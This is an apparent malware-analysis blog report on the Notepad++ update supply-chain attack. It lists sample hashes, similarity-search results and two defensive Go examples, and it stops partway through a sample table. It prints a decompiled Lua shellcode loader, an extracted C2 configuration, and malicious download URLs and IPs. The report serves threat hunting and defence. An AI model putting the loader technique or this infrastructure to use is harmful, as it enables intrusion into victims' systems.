Notepad++ supply chain attack related samples
In this report, we use our Kaibou Search Services to find samples related to the Notepad++ supply chain attack that took place between 2025-06 and 2025-12. During the analysis we uncovered 14 new similar samples and 11 new stager URLs related to the threat actor.
If you are already familiar with the attack, skip to our contribution.
Attack overview #
On October 23, 2025, a Notepad++ user reported suspicious activity related to the automatic update of Notepad++. The activity involved collecting information about the host system and uploading it to https://temp.sh, a file storage provider.

Up until December 9, 2025, more Notepad++ users reported that some update requests were redirected to external servers and trojanized executables were downloaded to their systems. This was possible because the update mechanism didn't verify cryptographic signatures on the downloaded binaries, so a Man-in-the-Middle (MitM) attacker in the right place could serve any file they wanted. On December 1, certificate verification was added to the update mechanism (wingup commit, Notepad++ commit).
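The check that was missing is easy to state and easy to get wrong, so here is an added example of the principle in Go. It is not wingup or Notepad++ code (the real fix verifies the signer certificate of the downloaded binary); it shows the same idea with an Ed25519 key pinned in the client and a signed manifest that names the installer's SHA256. The manifest format, the canonical signed string and the stand-in installer bytes are all constructed for illustration.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest is fetched over the network together with the binary. Nothing in
// it is trusted until Signature verifies under the key pinned in the client.
type Manifest struct {
	Version   string
	SHA256Hex string // hex SHA256 of the installer the publisher actually built
	Signature []byte // Ed25519 signature over canonicalBytes()
}

// canonicalBytes fixes the exact bytes that are signed, so version and hash
// cannot be swapped independently of each other (assumed format).
func (m Manifest) canonicalBytes() []byte {
	return []byte("update-manifest-v1\n" + m.Version + "\n" + m.SHA256Hex + "\n")
}

// SignManifest is the publisher-side step, run offline with the private key.
func SignManifest(priv ed25519.PrivateKey, version string, installer []byte) Manifest {
	sum := sha256.Sum256(installer)
	m := Manifest{Version: version, SHA256Hex: hex.EncodeToString(sum[:])}
	m.Signature = ed25519.Sign(priv, m.canonicalBytes())
	return m
}

var (
	ErrBadSignature = errors.New("manifest signature does not verify under the pinned key")
	ErrHashMismatch = errors.New("downloaded file does not match the signed SHA256")
)

// VerifyUpdate is the client-side gate. pinned is compiled into the client;
// manifest and installer both arrived over a network an attacker may control.
// Only when both checks pass may the installer be written to disk and run.
func VerifyUpdate(pinned ed25519.PublicKey, m Manifest, installer []byte) error {
	if !ed25519.Verify(pinned, m.canonicalBytes(), m.Signature) {
		return ErrBadSignature
	}
	sum := sha256.Sum256(installer)
	if hex.EncodeToString(sum[:]) != m.SHA256Hex {
		return ErrHashMismatch
	}
	return nil
}

// Outcome collects the verdicts for three deliveries of the same update.
type Outcome struct {
	Genuine        error // real manifest, real installer
	SwappedBinary  error // real manifest, installer replaced in transit
	ForgedManifest error // attacker re-signed a manifest for their own installer
}

// Simulate plays publisher, client and an in-path attacker with constructed
// stand-in payloads (no real installer bytes are involved).
func Simulate() (Outcome, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	genuine := []byte("constructed stand-in for the publisher's installer")
	trojan := []byte("constructed stand-in for a trojanized update.exe")
	m := SignManifest(priv, "8.8.9", genuine)

	var out Outcome
	out.Genuine = VerifyUpdate(pub, m, genuine)
	// The attacker can redirect the download but cannot change the signed hash.
	out.SwappedBinary = VerifyUpdate(pub, m, trojan)
	// The attacker can also serve their own manifest, but has to sign it with
	// a key the client does not trust.
	_, attackerPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	out.ForgedManifest = VerifyUpdate(pub, SignManifest(attackerPriv, "8.8.9", trojan), trojan)
	return out, nil
}

func main() {
	out, err := Simulate()
	if err != nil {
		panic(err)
	}
	fmt.Println("genuine update: ", out.Genuine)
	fmt.Println("swapped binary: ", out.SwappedBinary)
	fmt.Println("forged manifest:", out.ForgedManifest)
}
```

The version string is part of the signed bytes so that an attacker who can replay old, validly signed manifests cannot pair them with a different hash; a real updater would additionally refuse versions older than the one installed.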
On February 2, 2026, Don Ho, the main author of Notepad++, published a blog post about the security incidents that happened between June and December 2025.
As per the excellent overview from Costin Raiu, the attackers leveraged the shared hosting infrastructure at Hostinger to attack Notepad++ specifically. They probably compromised another site hosted on the same server to execute code, then used an exploit (maybe CVE-2025-6018) to elevate their privileges and possibly modify the Notepad++ update script (https://notepad-plus-plus.org/update/getDownloadUrl.php) to redirect users to attacker-controlled domains. A good illustration of the network traffic is given in the follow-up blog by Kenneth Kinion and Elliot Roe from Validin. On 2025-09-02 Hostinger updated the kernel and firmware of the server, which eliminated the original attack vector. The attackers could still meddle with the Notepad++ update traffic, however, probably through suo5 PHP tunnels.
Based on the techniques used during the attack, the events are attributed to a Chinese APT group, Lotus Blossom. The information so far suggests that they first fingerprinted many compromised hosts with netstat, systeminfo, tasklist and whoami commands and later decided which hosts were worth infecting further; too many infections would increase the risk of discovery.
Samples included in the attacks #
The first analysis report was published by Ivan Feigl from Rapid7; it's an excellent, detailed deep-dive into the samples they analyzed, including the Chrysalis backdoor. The following day, Georgy Kucherin and Anton Kargin from Kaspersky published a blog post about what they saw in their telemetry. We highly encourage everyone to read both reports for an in-depth understanding of the execution chains.

The Rapid7 report corresponds to Chain 3 in the Kaspersky blog.
Hostinger also published a short blog about the attack. Additional IoCs were added to the Notepad++ site on 2026-02-05. These contain some IP addresses, HTTP User-Agents and a few PHP files and their hashes. None of these are available in public databases.

Hunting for similar samples in Kaibou Search Services #
Let's try to expand on the known samples using our malware repository. We'll follow Kaspersky's order of chains. For every sample we'll check whether it is available in our database; for this we only need an MD5, SHA1 or SHA256 hash (the Rapid7 report lists SHA256 hashes, the Kaspersky report SHA1). To perform a similarity search for a sample, we need its TLSH digest. This is almost never published in reports, so we need to obtain it from other sources (e.g. VirusTotal, MalwareBazaar or our database, Kaibou).
We use the following abbreviations:
- VT = VirusTotal
- KTIP = Kaspersky Threat Intelligence Portal
- KSS = Kaibou Search Services
- `012345...abcdef` = SHA256 hash that begins with `012345` and ends with `abcdef`
Chain 1 #
update.exe 1
| Attribute | Value |
|---|---|
| Name | update.exe |
| SHA1 | 8e6e505438c21f3d281e1cc257abdbf7223b7f5a |
| SHA256 | 36c98c18215a244e501673d9f01fa093d1906d08a7ad9927905f8f004640e4e1 |
| TLSH | ? |
| KSS upload | - |
| VT upload | - |
| KTIP upload | 2025-07-31 05:22:00+00:00 |
| Size | 1141401 |
| Source | Kaspersky |
| Description | NSIS installer downloaded from http://45.76.155.202/update/update.exe, contains benign ProShow software with exploit code in file named load. |
update.exe 2
| Attribute | Value |
|---|---|
| Name | update.exe |
| SHA1 | 90e677d7ff5844407b9c073e3b7e896e078e11cd |
| SHA256 | 51266007c039ab80dbe9a2c38ed75759d954458d8864a0429c71e87be2bddce2 |
| TLSH | ? |
| KSS upload | - |
| VT upload | - |
| KTIP upload | 2025-08-05 03:59:00+00:00 |
| Size | 1141401 |
| Source | Kaspersky |
| Description | NSIS installer downloaded from http://45.76.155.202/update/update.exe, contains benign ProShow software with exploit code in file named load with modified C2 |
load 1
| Attribute | Value |
|---|---|
| Name | load |
| SHA1 | 06a6a5a39193075734a32e0235bde0e979c27228 |
| SHA256 | c7cc87ef3829a33b7f178d88a71ba548c37020005b09d16a76fcd356621335e6 |
| TLSH | ? |
| KSS upload | - |
| VT upload | - |
| KTIP upload | 2026-02-03 06:51:00+00:00 |
| Size | 15000 |
| Source | Kaspersky |
| Description | Exploit payload for ProShow |
load 2
| Attribute | Value |
|---|---|
| Name | load |
| SHA1 | 9c3ba38890ed984a25abb6a094b5dbf052f22fa7 |
| SHA256 | 26256ea1a345b788dd303f5621b5028cf572b733793039c8ee1e5c481113bd09 |
| TLSH | ? |
| KSS upload | - |
| VT upload | - |
| KTIP upload | 2026-02-03 06:47:00+00:00 |
| Size | 15000 |
| Source | Kaspersky |
| Description | Exploit payload for ProShow |
As none of the samples are in our database or VT, and Kaspersky doesn't use TLSH hashes, we cannot search for these. 🤷
Chain 2 #
update.exe 3
| Attribute | Value |
|---|---|
| Name | update.exe |
| SHA1 | 573549869e84544e3ef253bdba79851dcde4963a |
| SHA256 | 69caa18ec5e86cf3a7376f3a9a08d118cbade608432dc262ba6c7fe692da7d33 |
| TLSH | ? |
| KSS upload | - |
| VT upload | - |
| KTIP upload | 2025-09-16 06:13:00+00:00 |
| Size | 137955 |
| Source | Kaspersky |
| Description | NSIS installer downloaded from http://45.76.155.202/update/update.exe, contains LUA downloader. |
update.exe 4
| Attribute | Value |
|---|---|
| Name | update.exe |
| SHA1 | 13179c8f19fbf3d8473c49983a199e6cb4f318f0 |
| SHA256 | a3cf1c86731703043b3614e085b9c8c224d4125370f420ad031ad63c14d6c3ec |
| TLSH | ? |
| KSS upload | - |
| VT upload | - |
| KTIP upload | 2025-09-18 21:40:00+00:00 |
| Size | 137969 |
| Source | Kaspersky |
| Description | NSIS installer downloaded from http://45.76.155.202/update/update.exe, contains LUA downloader. |
update.exe 5
| Attribute | Value |
|---|---|
| Name | update.exe |
| SHA1 | 4c9aac447bf732acc97992290aa7a187b967ee2c |
| SHA256 | 798fd7c2a2d4f0865aec808962489b39f995961e38e2bebda8f84ddc5a935d86 |
| TLSH | ? |
| KSS upload | - |
| VT upload | - |
| KTIP upload | 2025-09-24 05:15:00+00:00 |
| Size | 137967 |
| Source | Kaspersky |
| Description | NSIS installer downloaded from http://45.76.155.202/update/update.exe, contains LUA downloader. |
update.exe 6
| Attribute | Value |
|---|---|
| Name | update.exe |
| SHA1 | 821c0cafb2aab0f063ef7e313f64313fc81d46cd |
| SHA256 | 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566 |
| TLSH | 48E302277FE0C673FC9A0B701E365F6396BBD5142421CB0B83909A45FA21785DE662F2 |
| KSS upload | 2025-10-20 00:10:23+00:00 |
| VT upload | - |
| KTIP upload | 2025-10-17 08:17:00+00:00 |
| Size | 153023 |
| Source | Kaspersky |
| Description | NSIS installer downloaded from http://95.179.213[.]0/update/update.exe, contains LUA downloader. |
Finally, the 6th update.exe, the October 2025 version of Chain 2, is available in our database. A similarity search returns 2 additional samples.

First similar sample to update.exe 6
| Attribute | Value |
|---|---|
| Name | update.exe |
| SHA1 | 26b72c28cc35552e9cf0c2939d5d595b2654e935 |
| SHA256 | cd88f47f6753d1e446e411fc4cb7a7a324adcd4ceb505aa1c8aee03aa951d681 |
| TLSH | 5CE302277FE0C673FC9A0A701E365F6396BBD5142421CB0B83909A45FA21785DE662F2 |
| KSS upload | 2026-02-05 10:10:08+00:00 |
| VT upload | 2026-02-06 05:05:08+00:00 |
| KTIP upload | 2026-02-05 03:56:00+00:00 |
| Size | 153023 |
| Source | Ukatemi |
| Description | Similar sample to 4d4aec...db4566 |

As mentioned in the Kaspersky report, lua5.1.dll, script.exe and alien.dll are legitimate, and alien.ini contains a compiled Lua 5.1 script. The first 64 bytes of the file look like this; the `\x1bLuaQ` signature (0x51 is the version byte) confirms it is indeed Lua 5.1 bytecode, so we can decompile it with luadec:
```text
00000000: 1b4c 7561 5100 0104 0404 0800 2700 0000 .LuaQ.......'...
00000010: 4043 3a5c 5573 6572 735c 4a6f 686e 5c44 @C:\Users\John\D
00000020: 6573 6b74 6f70 5c77 6c75 615c 6f75 7470 esktop\wlua\outp
00000030: 7574 2e6c 7561 0000 0000 0000 0000 0000 ut.lua..........
```
```lua
scc = ""                              -- shellcode blob (omitted in this listing)
package.cpath = "./?.dll"             -- load alien.dll from the current directory
core = require("alien.core")          -- legitimate Alien FFI library
k32 = (core.load)("Kern" .. "el32")   -- concatenation obscures the DLL names
u32 = (core.load)("Use" .. "r32")
len = (string.len)(scc)
va = k32.VirtualAlloc
vl = k32.VirtualLock
rmm = k32.RtlMoveMemory
es = u32.EnumWindowStationsW
va:types({"int", "int", "int", "int"; ret = "int", abi = "stdcall"})
vl:types({"int", "int"; ret = "int", abi = "stdcall"})
rmm:types({"int", "string", "int"; ret = "int", abi = "stdcall"})
es:types({"int", "int"; ret = "int", abi = "stdcall"})
ptr = va(0, len, 12288, 64)           -- 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
vl(ptr, len)
rmm(ptr, scc, len)                    -- copy the shellcode into the RWX buffer
es(ptr, 0)                            -- buffer passed as the EnumWindowStationProc callback
```
The decompiled code just loads a shellcode into memory and calls User32!EnumWindowStationsW with the shellcode buffer as its first argument. As per the Microsoft docs, the first argument is an EnumWindowStationProc callback function, so the call transfers execution to the shellcode. The shellcode itself is most likely an msfvenom windows/custom/reverse_http 32-bit payload (source code reverse_http.rb) that uses Wininet to download the next stage.
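To show what the header bytes above encode, here is an added Go example (not the authors' tooling and not luadec) that parses the Lua 5.1 chunk header and the start of the top-level function prototype, and recovers the embedded source name. The sample bytes are rebuilt from the hexdump above; the three prototype bytes past offset 0x3f (numparams, is_vararg, maxstacksize) are not in the dump and are filled with assumed values.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"io"
	"strings"
)

// LuaChunkInfo holds the 12-byte Lua 5.1 chunk header plus the first fields
// of the top-level function prototype, as laid out by lundump.c.
type LuaChunkInfo struct {
	Version, Format                            byte
	LittleEndian, IntegralNumbers              bool
	IntSize, SizeTSize, InstrSize, NumberSize  byte
	Source                                     string // chunk name stored by the compiler
	LineDefined, LastLineDefined               int32
	NumUpvalues, NumParams, IsVararg, MaxStack byte
}

var luaSignature = []byte{0x1b, 'L', 'u', 'a'}

// ParseLua51Header checks the magic, the version and the numeric layout, then
// reads the source name and line info of the main function. It decompiles
// nothing; it is the triage step that tells "alien.ini" apart from an INI file.
func ParseLua51Header(data []byte) (LuaChunkInfo, error) {
	var info LuaChunkInfo
	if len(data) < 12 || !bytes.Equal(data[:4], luaSignature) {
		return info, errors.New("not a Lua precompiled chunk (no \\x1bLua signature)")
	}
	info.Version, info.Format = data[4], data[5]
	if info.Version != 0x51 {
		return info, fmt.Errorf("unsupported Lua bytecode version 0x%02x", info.Version)
	}
	info.LittleEndian = data[6] == 1
	info.IntSize, info.SizeTSize, info.InstrSize, info.NumberSize = data[7], data[8], data[9], data[10]
	info.IntegralNumbers = data[11] == 1
	// The reader below assumes the layout produced by a 32-bit Windows luac.
	if !info.LittleEndian || info.IntSize != 4 || info.SizeTSize != 4 {
		return info, fmt.Errorf("unhandled layout: littleEndian=%v int=%d size_t=%d",
			info.LittleEndian, info.IntSize, info.SizeTSize)
	}
	r := bytes.NewReader(data[12:])
	var srcLen uint32 // size_t, 4 bytes in this layout
	if err := binary.Read(r, binary.LittleEndian, &srcLen); err != nil {
		return info, fmt.Errorf("source length: %w", err)
	}
	if srcLen > uint32(r.Len()) {
		return info, errors.New("source name length exceeds chunk size")
	}
	src := make([]byte, srcLen)
	if _, err := io.ReadFull(r, src); err != nil {
		return info, fmt.Errorf("source name: %w", err)
	}
	info.Source = string(bytes.TrimRight(src, "\x00")) // Lua stores the trailing NUL
	var lines [2]int32
	if err := binary.Read(r, binary.LittleEndian, &lines); err != nil {
		return info, fmt.Errorf("line info: %w", err)
	}
	info.LineDefined, info.LastLineDefined = lines[0], lines[1]
	var tail [4]byte
	if _, err := io.ReadFull(r, tail[:]); err != nil {
		return info, fmt.Errorf("prototype header: %w", err)
	}
	info.NumUpvalues, info.NumParams, info.IsVararg, info.MaxStack = tail[0], tail[1], tail[2], tail[3]
	return info, nil
}

// SourceKind decodes Lua's chunk-name convention: "@path" means compiled from
// that file, "=name" is a literal label, anything else is inline source text.
func (i LuaChunkInfo) SourceKind() string {
	switch {
	case strings.HasPrefix(i.Source, "@"):
		return "file: " + i.Source[1:]
	case strings.HasPrefix(i.Source, "="):
		return "label: " + i.Source[1:]
	default:
		return "string chunk"
	}
}

// SampleHead rebuilds the first 0x40 bytes shown in the hexdump above. The
// final three bytes (numparams, is_vararg, maxstacksize) are past the end of
// the dump and are assumed values for a main chunk, not bytes from the sample.
func SampleHead() []byte {
	b := []byte{0x1b, 0x4c, 0x75, 0x61, 0x51, 0x00, 0x01, 0x04, 0x04, 0x04, 0x08, 0x00}
	b = append(b, 0x27, 0x00, 0x00, 0x00) // source name length: 39, NUL included
	b = append(b, "@C:\\Users\\John\\Desktop\\wlua\\output.lua\x00"...)
	b = append(b, 0, 0, 0, 0, 0, 0, 0, 0) // linedefined, lastlinedefined: 0 for a main chunk
	b = append(b, 0)                      // nups
	return append(b, 0, 2, 2)             // assumed: numparams, is_vararg, maxstacksize
}

func main() {
	info, err := ParseLua51Header(SampleHead())
	if err != nil {
		panic(err)
	}
	fmt.Printf("Lua 5.%d bytecode, %d-byte numbers, compiled from %s\n",
		info.Version&0x0f, info.NumberSize, info.SourceKind())
}
```

The recovered chunk name is the path the attacker compiled the script from, which is why it survives in a file named like an INI; a text INI file fails at the signature check, so the same function doubles as a cheap "is this really configuration?" filter over extracted installer contents.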
Extracting the LHOST, LPORT, LURI and HTTP headers from the payload is fairly easy. These values match the ones for the September-October Chain 2 samples.
```json
{
  "path": "/help/Get-Start",
  "http_headers": [
    "Accept: */*",
    "Accept-Language: en-US,en;q=0.5",
    "Connection: close",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
  ],
  "domain": "safe-dns.it.com",
  "port": 443,
  "protocol": "https"
}
```
The NSIS installer also sets the creation date of extracted files. We can deduce that the first Lua-based archive was probably constructed on 2025-08-18 07:59:14+01:00, because lua5.1.dll probably didn't change across versions, only the alien.ini payload did. This payload was created on 2025-09-22 09:25:48+01:00.
```text
Name       Length CreationTime          LastWriteTime         LastAccessTime
----       ------ ------------          -------------         --------------
a.txt       16901 2026. 02. 09. 19:16:13 2026. 02. 09. 19:16:16 2026. 02. 09. 19:16:16
alien.dll   26112 2018. 01. 30. 19:27:40 2018. 01. 30. 19:27:40 2026. 02. 09. 19:16:28
alien.ini    2093 2025. 09. 22. 9:25:48  2025. 09. 22. 9:25:48  2026. 02. 09. 19:16:28
lua5.1.dll 163840 2025. 08. 18. 7:59:14  2025. 08. 18. 7:59:14  2026. 02. 09. 19:16:28
script.exe  45056 2025. 08. 18. 7:58:32  2025. 08. 18. 7:58:32  2026. 02. 09. 19:16:27
```
alien.ini (from cd88f4...51d681)
| Attribute | Value |
|---|---|
| Name | alien.ini |
| SHA1 | 0d0f315fd8cf408a483f8e2dd1e69422629ed9fd |
| SHA256 | 8e7a15c402b4f34b57185e07718cd6511a39a66045792174d21d832d17db2204 |
| TLSH | 7D417567DAB61E10E8355838C7AF430104080ACDFDA21E936F19F53071A70A8FDA91E5 |
| KSS upload | - |
| VT upload | - |
| KTIP upload | 2026-02-03 06:33:00+00:00 |
| Size | 2093 |
| Source | Ukatemi |
| Description | Compiled LUA payload (from cd88f4...51d681) |
Second similar sample to update.exe 6
| Attribute | Value |
|---|---|
| Name | update.exe |
| SHA1 | c7b2d5933b96e3e99201ca34bee866cfb299db88 |
| SHA256 | 33e66004447f988f896d3d16efae7cf04bbdd7057272a6ff63daa60af5f2a19d |
| TLSH | 50E302277FE0C573FC9A0E711E365F2396BBD9142820CF0B43909A45FA15786CE666B2 |
| KSS upload | 2026-02-05 10:10:08+00:00 |
| VT upload | 2026-02-06 04:54:49+00:00 |
| KTIP upload | 2026-02-05 03:58:00+00:00 |
| Size | 153064 |
| Source | Ukatemi |
| Description | Similar sample to 4d4aec...db4566 |
alien.ini (from 33e660...f2a19d)
| Attribute | Value |
|---|---|
| SHA1 | 13d0bb84d261802c5ef5488dfcc448a1987bb83a |
| SHA256 | 1de73eb2dd620dccfc757e4afcf0f58141e441c21b72c3adfe087c309e79bfed |
| TLSH | T1D3417457D2B65E20EA605435CB5B030201094BCCFED11F17AFA9F52052B7178BEBA6AA |
| KSS Upload | - |
| VT Upload | - |
| KTIP Upload | - |
| Size | 2193 |
| Source | Ukatemi |
| Description | Compiled LUA payload (from 33e660...f2a19d) |
This sample drops the same Lua components as all the other Lua-based samples, except for the script payload alien.ini. The decompiled Lua scripts differ only in a single line, which sets the library search path:
```diff
< package.cpath = "./?.dll"
---
> package.cpath = (arg[0]):match(".*\\") .. "?.dll;" .. package.cpath
```
The embedded shellcode is byte-for-byte identical to the one in the previous similar version:
```text
6b780cf1def14589f7b9d5835f05d24fa2443b6524851f386ec3c9379af68cc6 ./33e660_shellcode
6b780cf1def14589f7b9d5835f05d24fa2443b6524851f386ec3c9379af68cc6 ./cd88f4_shellcode
```
The timestamps of the legitimate files are the same as before, but here alien.ini was created a month later than the previous one, on 2025-10-21 07:54:40+01:00.
```text
Name       Length CreationTime          LastWriteTime         LastAccessTime
----       ------ ------------          -------------         --------------
a.txt       17349 2026. 02. 09. 19:00:02 2026. 02. 09. 19:00:04 2026. 02. 09. 19:00:04
alien.dll   26112 2018. 01. 30. 19:27:40 2018. 01. 30. 19:27:40 2026. 02. 09. 19:00:16
alien.ini    2193 2025. 10. 21. 7:54:40  2025. 10. 21. 7:54:40  2026. 02. 09. 19:00:17
lua5.1.dll 163840 2025. 08. 18. 7:59:14  2025. 08. 18. 7:59:14  2026. 02. 09. 19:00:16
script.exe  45056 2025. 08. 18. 7:58:32  2025. 08. 18. 7:58:32  2026. 02. 09. 19:00:16
```
Chain 3 #
update.exe 7
| Attribute | Value |
|---|---|
| Name | update.exe |
| SHA1 | d7ffd7b588880cf61b603346a3557e7cce648c93 |
| SHA256 | a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9 |
| TLSH | 19E423255AB1C035C766233F2DB23367DBF680252ACC552743243FFA74966E7228FA94 |
| KSS upload | - |
| VT upload | 2025-10-22 21:49:28+00:00 |
| KTIP upload | 2025-10-06 05:45:00+00:00 |
| Size | 697145 |
| Source | Rapid7 |
| Description | NSIS installer downloaded from http://45.32.144.255/update/update.exe, contains BluetoothService.exe, log.dll and BluetoothService |
There are no similar samples to this one in our database.
log.dll
| Attribute | Value |
|---|---|
| Name | log.dll |
| SHA1 | f7910d943a013eede24ac89d6388c1b98f8b3717 |
| SHA256 | 3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad |
| TLSH | 93835A01B5A1C175E9BE19354428DA754B3EB910DEE1DEAB7789067E4F302C2EE30D2B |
| KSS upload | 2025-10-10 19:15:35+00:00 |
| VT upload | 2025-10-22 21:50:24+00:00 |
| KTIP upload | 2025-12-03 04:41:00+00:00 |
| Size | 85504 |
| Source | Rapid7 |
| Description | Malicious DLL sideloaded by BluetoothService.exe, exporting LogInit, LogWrite |
A similarity search for log.dll with a threshold of 40 resulted in 89733 similar files; 430 of these were uploaded to Kaibou after 2025-06-01.
After some manual analysis we found that the similarity comes from the CRT functions, which occupy most of the binary; the functions actually written by the authors take up a much smaller portion. So while the binary similarity (which is what TLSH detects) is real, none of the samples have similar functionality.
Similarity searching for the encrypted shellcode (BluetoothService) is useless, as its entropy is 7.999 bits per byte, practically indistinguishable from random data.
Rapid7 found additional malicious files on the infected server under the C:\ProgramData\USOShared directory. conf.c contained a small shellcode loader that downloads and executes the next stage. The shellcode loads Wininet.dll using LoadLibraryA, and uses InternetConnectA and HttpSendRequestA from it to download a file from a specific host with custom headers. The next stage was a Cobalt Strike Beacon.

The loader samples below were found by Rapid7 in public databases and are similar to the one observed during the incident.
loader sample details
| Attribute | Value |
|---|---|
| Name | loader 1 |
| SHA1 | c68d09dd50e357fd3de17a70b7724f8949441d77 |
| SHA256 | 0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd |
| TLSH | A334E677AB30115DDD2C1974EDB344C518E6EEA0881542FF379F3E188A3D892B9A6E07 |
| KSS upload | 2025-05-08 01:57:07+00:00 |
| VT upload | 2025-05-07 08:12:59+00:00 |
| KTIP upload | 2026-02-02 16:00:00+00:00 |
| Size | 233472 |
| Source | Rapid7 |
| Description | Loader 1 found in public malware repositories similar to loader compiled from conf.c |
| Attribute | Value |
|---|---|
| Name | loader 2 |
| SHA1 | 9fbf2195dee991b1e5a727fd51391dcc2d7a4b16 |
| SHA256 | e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda |
| TLSH | 9A82E73BE31348FDC916D67496FB6B32BCB23D6345A1573D1360D2F51E21AA02DAEA10 |
| KSS upload | 2025-06-11 14:57:38+00:00 |
| VT upload | 2025-06-09 07:09:33+00:00 |
| KTIP upload | 2025-06-09 01:14:00+00:00 |
| Size | 18944 |
| Source | Rapid7 |
| Description | Loader 2 found in public malware repositories similar to loader compiled from conf.c |
| Attribute | Value |
|---|---|
| Name | loader 3 |
| SHA1 | 3090ecf034337857f786084fb14e63354e271c5d |
| SHA256 | b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3 |
| TLSH | 1DB36A2B73E930F8E1768278C8914A15EB76B87647209FAF07A442561F236D18D3EF71 |
| KSS upload | - |
| VT upload | 2025-03-27 06:42:43+00:00 |
| KTIP upload | 2025-03-27 17:52:00+00:00 |
| Size | 108032 |
| Source | Rapid7 |
| Description | Loader 3 found in public malware repositories similar to loader compiled from conf.c |
| Attribute | Value |
|---|---|
| Name | loader 4 |
| SHA1 | 9c0eff4deeb626730ad6a05c85eb138df48372ce |
| SHA256 | fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a |
| TLSH | D3C3396873B9C0B9F1768278C5710A05E7FE784646209FAF03A4CE572F636918D3AF61 |
| KSS upload | 2025-11-14 20:55:06+00:00 |
| VT upload | 2025-11-14 10:27:55+00:00 |
| KTIP upload | 2025-11-14 08:50:00+00:00 |
| Size | 120416 |
| Source | Rapid7 |
| Description | Loader 4 found in public malware repositories similar to loader compiled from conf.c |

As all the loaders are available either in our database or on VirusTotal, we can perform similarity searches for them. There are no additional similar samples for loaders 1 and 4.
There are 23 samples in KSS similar to loader 2 (e7cd60...1c6eda). Let's have a closer look! All of them are x64 PE files. The function at 0x401630 posts a message to the current thread and peeks it immediately, checking that the values arrived correctly. If they did, it checks the elapsed time after a Sleep(650). These are common sandbox / emulation detection techniques. If all is well, it allocates a heap buffer, copies the encrypted shellcode to it and calls DecryptAndExecuteShellcode (at 0x401595).


Shellcode decryption is just a XOR with the fixed 4 byte global key. Then the shellcode is executed using CreateThread.

We note that the WriteModuleHandleRefAndGetProcAddress function (at 0x401563) has no effect in this sample. It would write the addresses of GetModuleHandleA and GetProcAddress into the shellcode at the offsets held in the DAT_0040302c and DAT_00403030 global variables, but these are 0 in this sample. We think this loader may also be used with other shellcode payloads that need these functions.

Of the 23 similar samples returned by KSS:
- 12 are only similar because of CRT
- 11 implement the exact same functionality with different payloads
Similar sample details
| Attribute | Value |
|---|---|
| SHA1 | 34596b4e8b539af3c6c90285a2824511b156fa19 |
| SHA256 | 055f7fce25108a9b04668161b8ec88a729ef1c488e6fb2de27c857749f241c11 |
| TLSH | 7C82C63BE31358FDC916D6B496FB66327CB2396306A1573E1330D6F51E216A02E9FA10 |
| KSS Upload | 2024-08-26 10:25:02+00:00 |
| VT Upload | 2024-08-25 02:55:53+00:00 |
| KTIP Upload | 2024-08-25 05:09:00+00:00 |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | a7fdcb55424e8b68a94d5b9cd59c4731c5707124 |
| SHA256 | 07f24f0d1a2eb63c20c7eb2909ead1aa36681fe49fc22b8222e23a4fbd53bbeb |
| TLSH | 2682D73BE31358FCC916D67496FB6B327CB239A306A1473D2370D6F51E216A02D9EA10 |
| KSS Upload | 2024-11-25 11:37:11+00:00 |
| VT Upload | 2024-11-22 09:34:05+00:00 |
| KTIP Upload | 2024-11-22 11:27:00+00:00 |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | d97e19ca7439952a3d448d9d7a3a8820f8939398 |
| SHA256 | 15e012d0a176409a0921ca088ce61b2be7b15c5af092315e56ef9234d31e7f90 |
| TLSH | 2E82E81BE31348FCC916D67496FB6B3278B23DA106A1473D3368D2F51F216A02DAEA11 |
| KSS Upload | 2022-03-23 16:33:30+00:00 |
| VT Upload | 2022-03-18 00:31:46+00:00 |
| KTIP Upload | 2022-03-13 23:51:00+00:00 |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | 5562dcbb2b5dc98e4469bdd684f9dc18b43c50f7 |
| SHA256 | 7811fb7661957f1b7689bf0d69068cc39fa93cff235260ab5f35b5fd493d6ceb |
| TLSH | DA82D73BE31348FDC516D6B495FB6B327CB2799306A1573D1260D2F51F216A02E9EA10 |
| KSS Upload | 2025-09-12 23:09:13+00:00 |
| VT Upload | - |
| KTIP Upload | 2025-09-11 16:14:00+00:00 |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | 79b0b78afadf13ef38d9d98365a296e95e368426 |
| SHA256 | b479247df50f458ba3da9107e89b37ff732a688a9aab152c82f31d41f3fb269b |
| TLSH | DE82D77BE21398FCC916D6B496FB67327CB239A306A0473D1360D1F51F216A02E9EA15 |
| KSS Upload | 2025-04-16 04:32:29+00:00 |
| VT Upload | 2025-05-01 07:25:58+00:00 |
| KTIP Upload | - |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | e180f2c7efae2151d9292510c444c575ed786410 |
| SHA256 | b76d2570f60d51bdbad3216989b3266cea7c71496a24b719a976dde620761e47 |
| TLSH | 2182D63BE31348FCC916D67495FB6A327CB2396346A1573D1360E2F51E21AA02DAEA11 |
| KSS Upload | 2024-01-10 03:08:57+00:00 |
| VT Upload | 2024-01-10 13:52:16+00:00 |
| KTIP Upload | 2024-01-09 23:38:00+00:00 |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | c8deff347d505012aa9632ef3fcdccf492b6c104 |
| SHA256 | b99715064cf004cf3361ada06f5bb9586970e1c76ffa2b8a85cdd97b9362b707 |
